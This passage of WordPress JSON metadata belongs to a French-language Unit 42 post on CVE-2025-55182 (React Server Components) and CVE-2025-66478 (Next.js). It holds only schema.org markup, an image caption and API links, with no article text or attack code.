CVE-2025-55182.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/02_Vulnerabilities_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of CVE-2025-55182 (React) and CVE-2025-66478 (Next.js). Close-up of a digital display on electronic equipment with illuminated text reading \"SYSTEM HACKED\" in red, set against a blurred background of blue and red lights."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/cve-2025-55182-react-and-cve-2025-66478-next\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Exploitation d'une vuln\u00e9rabilit\u00e9 critique dans les React Server Components (Mise \u00e0 jour du 12 d\u00e9cembre)"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 42","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/4ffb3c2d260a0150fb91b3715442f8b3","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Unit 42"},"url":"https:\/\/unit42.paloaltonetworks.com\/fr\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/167644","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/comments?post=167644"}],"version-history":[{"count":8,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/167644\/revisions"}],"predecessor-version":[{"id":168581,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/167644\/revisions\/168581"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media\/167623"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media?parent=167644"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/categories?post=167644"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/tags?post=167644"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/product_categories?post=167644"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/coauthors?post=167644"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}